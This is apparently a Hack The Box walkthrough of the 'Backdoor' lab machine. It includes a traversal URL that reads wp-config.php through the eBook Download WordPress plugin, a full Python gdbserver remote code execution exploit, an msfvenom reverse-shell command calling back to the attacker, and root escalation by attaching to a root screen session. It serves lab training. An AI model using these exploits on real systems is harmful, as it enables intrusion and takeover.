Backdoor HTB Write-up | Hack The Box Walkthrough (backdoor.htb, 10.10.11.125)

Aditya Chauhan
9 min read · Dec 7, 2021


Information gathering

First, scan every TCP port with nmap (-A already implies -sC and -sV, so the extra flags are redundant but harmless):

┌──(kali㉿kali)-[~]
└─$ nmap -A -sC -sV -sS -p- 10.10.11.125
Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-30 02:16 EST
Stats: 0:00:04 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 0.14% done
Nmap scan report for backdoor.htb (10.10.11.125)
Host is up (0.20s latency).
Not shown: 65417 closed ports, 115 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 b4:de:43:38:46:57:db:4c:21:3b:69:f3:db:3c:62:88 (RSA)
| 256 aa:c9:fc:21:0f:3e:f4:ec:6b:35:70:26:22:53:ef:66 (ECDSA)
|_ 256 d2:8b:e4:ec:07:61:aa:ca:f8:ec:1c:f8:8c:c1:f6:e1 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-generator: WordPress 5.8.1
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Backdoor – Real-Life
1337/tcp open waste?
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.91%E=4%D=11/30%OT=22%CT=1%CU=37705%PV=Y%DS=2%DC=T%G=Y%TM=61A5D5
OS:A1%P=x86_64-pc-linux-gnu)SEQ(SP=108%GCD=1%ISR=10B%TI=Z%CI=Z%II=I%TS=A)OP
OS:S(O1=M54DST11NW7%O2=M54DST11NW7%O3=M54DNNT11NW7%O4=M54DST11NW7%O5=M54DST
OS:11NW7%O6=M54DST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)EC
OS:N(R=Y%DF=Y%T=40%W=FAF0%O=M54DNNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=
OS:AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(
OS:R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%
OS:F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N
OS:%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%C
OS:D=S)

Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 587/tcp)
HOP RTT ADDRESS
1 204.20 ms 10.10.14.1
2 204.33 ms backdoor.htb (10.10.11.125)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1469.77 seconds

The http-generator header shows the site runs WordPress 5.8.1, so the next step is wpscan to enumerate plugins, themes, users and other exposed files.

wpscan output

wpscan --url http://10.10.11.125 --enumerate
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | ‘_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|

WordPress Security Scanner by the WPScan Team
Version 3.8.18

@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[i] Updating the Database …
[i] Update completed.

[+] URL: http://10.10.11.125/ [10.10.11.125]
[+] Started: Tue Nov 30 02:29:55 2021

Interesting Finding(s):

[+] Headers
| Interesting Entry: Server: Apache/2.4.41 (Ubuntu)
| Found By: Headers (Passive Detection)
| Confidence: 100%

[+] XML-RPC seems to be enabled: http://10.10.11.125/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://10.10.11.125/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%

[+] Upload directory has listing enabled: http://10.10.11.125/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://10.10.11.125/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 5.8.1 identified (Insecure, released on 2021-09-09).
| Found By: Rss Generator (Passive Detection)
| - http://10.10.11.125/index.php/feed/, <generator>https://wordpress.org/?v=5.8.1</generator>
| - http://10.10.11.125/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.8.1</generator>

[+] WordPress theme in use: twentyseventeen
| Location: http://10.10.11.125/wp-content/themes/twentyseventeen/
| Latest Version: 2.8 (up to date)
| Last Updated: 2021-07-22T00:00:00.000Z
| Readme: http://10.10.11.125/wp-content/themes/twentyseventeen/readme.txt
| Style URL: http://10.10.11.125/wp-content/themes/twentyseventeen/style.css?ver=20201208
| Style Name: Twenty Seventeen
| Style URI: https://wordpress.org/themes/twentyseventeen/
| Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a f…
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Found By: Css Style In Homepage (Passive Detection)
|
| Version: 2.8 (80% confidence)
| Found By: Style (Passive Detection)
| - http://10.10.11.125/wp-content/themes/twentyseventeen/style.css?ver=20201208, Match: 'Version: 2.8'

[+] Enumerating Vulnerable Plugins (via Passive Methods)

[i] No plugins Found.

[+] Enumerating Vulnerable Themes (via Passive and Aggressive Methods)
Checking Known Locations — Time: 00:00:15 <========================================================================================> (358 / 358) 100.00% Time: 00:00:15
[+] Checking Theme Versions (via Passive and Aggressive Methods)

[i] No themes Found.

[+] Enumerating Timthumbs (via Passive and Aggressive Methods)
Checking Known Locations — Time: 00:01:50 <======================================================================================> (2575 / 2575) 100.00% Time: 00:01:50

[i] No Timthumbs Found.

[+] Enumerating Config Backups (via Passive and Aggressive Methods)
Checking Config Backups — Time: 00:00:06 <=========================================================================================> (137 / 137) 100.00% Time: 00:00:06

[i] No Config Backups Found.

[+] Enumerating DB Exports (via Passive and Aggressive Methods)
Checking DB Exports — Time: 00:00:03 <===============================================================================================> (71 / 71) 100.00% Time: 00:00:03

[i] No DB Exports Found.

[+] Enumerating Medias (via Passive and Aggressive Methods) (Permalink setting must be set to “Plain” for those to be detected)
Brute Forcing Attachment IDs — Time: 00:00:04 <====================================================================================> (100 / 100) 100.00% Time: 00:00:04

[i] No Medias Found.

[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs — Time: 00:00:01 <==========================================================================================> (10 / 10) 100.00% Time: 00:00:01

[i] User(s) Identified:

[+] admin
| Found By: Rss Generator (Passive Detection)
| Confirmed By:
| Wp Json Api (Aggressive Detection)
| — http://10.10.11.125/index.php/wp-json/wp/v2/users/?per_page=100&page=1
| Author Id Brute Forcing — Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Tue Nov 30 02:32:37 2021
[+] Requests Done: 3311
[+] Cached Requests: 8
[+] Data Sent: 914.804 KB
[+] Data Received: 18.281 MB
[+] Memory used: 223.848 MB
[+] Elapsed time: 00:02:42

The scan is not very informative on its own: plugin enumeration here is passive only (it detects plugins referenced from the homepage) and without an API token wpscan prints no vulnerability data. It does confirm two things worth keeping: the only user is admin, and the uploads directory has directory listing enabled, which suggests other directories under wp-content may be browsable too.

Look at the website content

Next, brute-force directories with dirb:

┌──(root💀kali)-[~]
└─# dirb http://10.10.11.125

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Tue Nov 30 04:11:30 2021
URL_BASE: http://10.10.11.125/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://10.10.11.125/ ----
+ http://10.10.11.125/index.php (CODE:301|SIZE:0)
+ http://10.10.11.125/server-status (CODE:403|SIZE:277)
==> DIRECTORY: http://10.10.11.125/wp-admin/
==> DIRECTORY: http://10.10.11.125/wp-content/
==> DIRECTORY: http://10.10.11.125/wp-includes/
+ http://10.10.11.125/xmlrpc.php (CODE:405|SIZE:42)

---- Entering directory: http://10.10.11.125/wp-admin/ ----
+ http://10.10.11.125/wp-admin/admin.php (CODE:302|SIZE:0)
==> DIRECTORY: http://10.10.11.125/wp-admin/css/
==> DIRECTORY: http://10.10.11.125/wp-admin/images/
==> DIRECTORY: http://10.10.11.125/wp-admin/includes/
+ http://10.10.11.125/wp-admin/index.php (CODE:302|SIZE:0)
==> DIRECTORY: http://10.10.11.125/wp-admin/js/
==> DIRECTORY: http://10.10.11.125/wp-admin/maint/
==> DIRECTORY: http://10.10.11.125/wp-admin/network/
==> DIRECTORY: http://10.10.11.125/wp-admin/user/

---- Entering directory: http://10.10.11.125/wp-content/ ----
+ http://10.10.11.125/wp-content/index.php (CODE:200|SIZE:0)
==> DIRECTORY: http://10.10.11.125/wp-content/plugins/

Browsing the discovered directories by hand, /wp-content/plugins/ has directory listing enabled, and it contains a single plugin directory, ebook-download.

Inside it only readme.txt has any content; it identifies the plugin (eBook Download) and its version.

Searching exploit-db for the plugin name turns up a directory traversal advisory:

https://www.exploit-db.com/exploits/39575

The vulnerable endpoint is filedownload.php: its ebookdownloadurl parameter is handed to the file system without sanitisation, so ../ sequences walk out of the plugin directory to any file the web server user can read.

http://backdoor.htb/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../wp-config.php

This is an arbitrary file read rather than a code-execution bug: the server returns the raw wp-config.php, which contains the database credentials.

That confirms the vulnerability is exploitable. The obvious follow-up, logging in to /wp-admin as admin with the database password, fails: the two passwords are different. So attention turns to the unidentified service on port 1337.

The same file-read primitive can identify what is listening on 1337, because the process table is exposed as files under /proc.

/proc/<pid>/cmdline holds the command line of each running process (argv entries separated by NUL bytes). The PID is not known in advance, so the request is repeated over a range; on this box the interesting processes sit roughly between 900 and 1000.

Sweeping that range through the traversal shows a gdbserver process bound to port 1337. gdbserver speaks the GDB remote protocol with no authentication at all, so anyone who can reach the port can read and write the debugged process's memory and control its execution, which is a remote code execution primitive by design.

The same /proc sweep also turns up a process running as root that will matter for privilege escalation later. There is no shell yet, but the route to root is already visible before the first foothold.

User

Exploiting gdbserver (RCE)

Step 1: save the exploit locally (the IPs in its usage text are placeholders; change them to yours):

# Exploit Title: GNU gdbserver 9.2 - Remote Command Execution (RCE)
# Date: 2021-11-21
# Exploit Author: Roberto Gesteira Miñarro (7Rocky)
# Vendor Homepage: https://www.gnu.org/software/gdb/
# Software Link: https://www.gnu.org/software/gdb/download/
# Version: GNU gdbserver (Ubuntu 9.2-0ubuntu1~20.04) 9.2
# Tested on: Ubuntu Linux (gdbserver debugging x64 and x86 binaries)

#!/usr/bin/env python3

import binascii
import socket
import struct
import sys

help = f'''
Usage: python3 {sys.argv[0]} <gdbserver-ip:port> <path-to-shellcode>

Example:
- Victim's gdbserver -> 10.10.11.125:1337
- Attacker's listener -> 10.10.14.6:4444

1. Generate shellcode with msfvenom:
$ msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.10.100 LPORT=4444 PrependFork=true -o rev.bin

2. Listen with Netcat:
$ nc -nlvp 4444

3. Run the exploit:
$ python3 {sys.argv[0]} 10.10.10.200:1337 rev.bin
'''


def checksum(s: str) -> str:
    # GDB remote protocol checksum: packet bytes summed modulo 256, sent as two hex digits
    res = sum(map(ord, s)) % 256
    return f'{res:02x}'


def ack(sock):
    sock.send(b'+')


def send(sock, s: str) -> str:
    # Packets are framed as $<data>#<checksum>; the peer replies with '+' and its own packet
    sock.send(f'${s}#{checksum(s)}'.encode())
    res = sock.recv(1024)
    ack(sock)
    return res.decode()


def exploit(sock, payload: str):
    send(sock, 'qSupported:multiprocess+;qRelocInsn+;qvCont+;')
    send(sock, '!')  # enable extended mode

    try:
        # Single-step once; the stop reply carries the program counter register
        res = send(sock, 'vCont;s')
        data = res.split(';')[2]
        arch, pc = data.split(':')
    except Exception:
        print('[!] ERROR: Unexpected response. Try again later')
        exit(1)

    if arch == '10':
        print('[+] Found x64 arch')
        # The register value may be run-length encoded; drop the "0*" run and zero-pad
        pc = binascii.unhexlify(pc.split('0*')[0])
        pc += b'\0' * (8 - len(pc))
        addr = hex(struct.unpack('<Q', pc)[0])[2:]
        addr = '0' * (16 - len(addr)) + addr
    elif arch == '08':
        print('[+] Found x86 arch')
        pc = binascii.unhexlify(pc)
        pc += b'\0' * (4 - len(pc))
        addr = hex(struct.unpack('<I', pc)[0])[2:]
        addr = '0' * (8 - len(addr)) + addr
    else:
        print(f'[!] ERROR: Unsupported register id {arch}')
        exit(1)

    # The M packet length is a byte count; payload is hex, so it is half the string length
    hex_length = f'{len(payload) // 2:x}'

    print('[+] Sending payload')
    send(sock, f'M{addr},{hex_length}:{payload}')  # write the shellcode at the current PC
    send(sock, 'vCont;c')                           # resume: the process executes it


def main():
    if len(sys.argv) < 3:
        print(help)
        exit(1)

    ip, port = sys.argv[1].split(':')
    file = sys.argv[2]

    try:
        with open(file, 'rb') as f:
            payload = f.read().hex()
    except FileNotFoundError:
        print(f'[!] ERROR: File {file} not found')
        exit(1)

    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
        sock.connect((ip, int(port)))
        print('[+] Connected to target. Preparing exploit')
        exploit(sock, payload)
        print('[*] Pwned!! Check your listener')


if __name__ == '__main__':
    main()

Step2 :

Step 2: generate the reverse-shell payload with msfvenom. PrependFork=true forks before connecting back, so the debugged process keeps running and the gdbserver session is not torn down when the shell exits:

msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.14.6 LPORT=4444 PrependFork=true -o rev.bin

Step 3: start a netcat listener on port 4444:

nc -nlvp 4444

Step 4: run the exploit against port 1337:

┌──(kali㉿kali)-[~/Downloads]
└─$ python3 50539.py 10.10.11.125:1337 rev.bin
[+] Connected to target. Preparing exploit
[+] Found x64 arch
[+] Sending payload
[*] Pwned!! Check your listener

The listener receives a shell as user; a pty makes it usable:

┌──(kali㉿kali)-[~]
└─$ nc -nlvp 4444
listening on [any] 4444 …
connect to [10.10.14.6] from (UNKNOWN) [10.10.11.125] 48584
id
uid=1000(user) gid=1000(user) groups=1000(user)
python3 -c "import pty;pty.spawn('/bin/bash')"
user@Backdoor:/home/user$ cat user.txt
cat user.txt
28171exxxxxxxxxxxxxxxxxdbe

That is the user flag; now for root.

Root

find / -perm -4000 -ls 2>/dev/null
ps -ef | grep -i screen

screen is SUID root, and ps shows a detached screen session owned by root, named root. Because the SUID bit makes screen run with root privileges, an unprivileged user can attach to that session and inherit the root shell inside it:

export TERM=xterm
screen -x root/root

Attaching drops straight into root's session, and the shell inside it runs as root.
